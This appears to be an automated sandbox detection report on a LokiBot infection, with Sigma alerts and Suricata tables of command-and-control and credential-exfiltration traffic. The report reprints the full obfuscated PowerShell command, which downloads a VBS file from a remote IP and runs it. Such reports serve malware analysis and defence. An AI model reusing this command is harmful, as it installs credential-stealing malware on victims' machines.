InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICA

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", ProcessId: 2364, ProcessName: csc.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:32.403357+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49761	94.156.177.95	80	TCP
2024-11-15T18:14:33.528121+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49766	94.156.177.95	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:31.426231+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.95	80	TCP
2024-11-15T18:14:32.580658+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49766	94.156.177.95	80	TCP
2024-11-15T18:14:33.648797+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:34.779935+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:35.927180+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:37.042044+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:38.155116+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:39.310499+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:40.418721+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:41.540423+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:42.666273+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:43.780827+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:44.948157+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:47.565744+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:48.732748+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:49.866643+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:51.015684+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:52.116189+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:53.231994+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:54.415833+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:55.567481+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:56.697888+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:57.888076+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:14:59.477956+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:15:00.622720+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:01.716470+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:02.843351+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:03.944044+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:05.079130+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:06.232263+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:07.371818+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:08.527825+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:09.646081+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:10.738508+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:11.909051+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:13.033207+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:14.143909+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:15.260992+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:16.354360+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:17.488009+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:18.648637+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:19.770914+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:21.183194+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:22.276771+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:23.386905+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:24.486068+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:26.198172+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:27.680897+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:28.793698+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:29.925408+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:31.052611+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:32.214108+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:33.332376+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:34.479837+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:35.618188+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:36.745165+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:37.835646+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:38.930011+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:40.041826+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:41.133212+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:42.287477+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:43.432085+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:44.558614+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:45.645313+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:46.938497+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:48.053000+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:49.198772+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:51.314217+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:52.472929+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:53.951386+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:55.077914+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:56.206763+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:57.353617+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:58.470891+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:15:59.601399+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:16:00.728619+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:01.834858+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:03.165663+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:04.337364+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:05.839274+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.95	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:34.621400+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49771	TCP
2024-11-15T18:14:35.757468+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49776	TCP
2024-11-15T18:14:36.867216+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49785	TCP
2024-11-15T18:14:38.000486+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49790	TCP
2024-11-15T18:14:39.118238+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49795	TCP
2024-11-15T18:14:40.267944+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49801	TCP
2024-11-15T18:14:41.391581+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49807	TCP
2024-11-15T18:14:42.512208+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49811	TCP
2024-11-15T18:14:43.617333+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49815	TCP
2024-11-15T18:14:44.796883+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49820	TCP
2024-11-15T18:14:47.382329+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49827	TCP
2024-11-15T18:14:48.534810+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49839	TCP
2024-11-15T18:14:49.707074+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49845	TCP
2024-11-15T18:14:50.829216+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49851	TCP
2024-11-15T18:14:51.964278+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49856	TCP
2024-11-15T18:14:53.069205+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49862	TCP
2024-11-15T18:14:54.213464+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49869	TCP
2024-11-15T18:14:55.434663+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49875	TCP
2024-11-15T18:14:56.546595+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49880	TCP
2024-11-15T18:14:57.681469+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49885	TCP
2024-11-15T18:14:59.322192+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49889	TCP
2024-11-15T18:15:00.442485+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49897	TCP
2024-11-15T18:15:01.562051+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49901	TCP
2024-11-15T18:15:02.681975+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49905	TCP
2024-11-15T18:15:03.792789+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49909	TCP
2024-11-15T18:15:04.915936+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49915	TCP
2024-11-15T18:15:06.070494+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49920	TCP
2024-11-15T18:15:07.212159+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49925	TCP
2024-11-15T18:15:08.368386+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49931	TCP
2024-11-15T18:15:09.483923+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49935	TCP
2024-11-15T18:15:10.593620+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49941	TCP
2024-11-15T18:15:11.704837+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49947	TCP
2024-11-15T18:15:12.856000+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49952	TCP
2024-11-15T18:15:13.992144+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49959	TCP
2024-11-15T18:15:15.100964+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49965	TCP
2024-11-15T18:15:16.196125+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49971	TCP
2024-11-15T18:15:17.335539+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49976	TCP
2024-11-15T18:15:18.454312+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49984	TCP
2024-11-15T18:15:19.624026+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49991	TCP
2024-11-15T18:15:20.784082+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	49999	TCP
2024-11-15T18:15:22.101011+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50006	TCP
2024-11-15T18:15:23.210169+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50014	TCP
2024-11-15T18:15:24.323159+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50022	TCP
2024-11-15T18:15:26.047516+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50023	TCP
2024-11-15T18:15:27.526873+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50024	TCP
2024-11-15T18:15:28.646915+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50025	TCP
2024-11-15T18:15:29.760486+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50026	TCP
2024-11-15T18:15:30.900416+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50027	TCP
2024-11-15T18:15:32.054223+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50028	TCP
2024-11-15T18:15:33.173572+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50029	TCP
2024-11-15T18:15:34.327921+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50030	TCP
2024-11-15T18:15:35.466271+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50031	TCP
2024-11-15T18:15:36.589634+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50032	TCP
2024-11-15T18:15:37.687213+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50033	TCP
2024-11-15T18:15:38.780886+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50034	TCP
2024-11-15T18:15:39.888799+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50035	TCP
2024-11-15T18:15:40.983503+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50036	TCP
2024-11-15T18:15:42.133977+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50037	TCP
2024-11-15T18:15:43.281944+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50038	TCP
2024-11-15T18:15:44.438768+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50039	TCP
2024-11-15T18:15:45.503504+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50040	TCP
2024-11-15T18:15:46.641061+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50041	TCP
2024-11-15T18:15:47.905044+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50042	TCP
2024-11-15T18:15:49.013886+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50043	TCP
2024-11-15T18:15:50.176256+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50044	TCP
2024-11-15T18:15:52.309323+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50045	TCP
2024-11-15T18:15:53.790066+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50046	TCP
2024-11-15T18:15:54.922369+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50047	TCP
2024-11-15T18:15:56.061021+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50048	TCP
2024-11-15T18:15:57.195280+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50049	TCP
2024-11-15T18:15:58.307066+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50050	TCP
2024-11-15T18:15:59.445468+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50051	TCP
2024-11-15T18:16:00.581983+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50052	TCP
2024-11-15T18:16:01.682183+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50053	TCP
2024-11-15T18:16:02.821050+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50054	TCP
2024-11-15T18:16:04.174978+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50055	TCP
2024-11-15T18:16:05.368969+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50056	TCP
2024-11-15T18:16:06.523288+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.5	50057	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:34.615993+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:35.751845+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:36.861902+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:37.995017+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:39.112509+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:40.262543+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49801	94.156.177.95	80	TCP
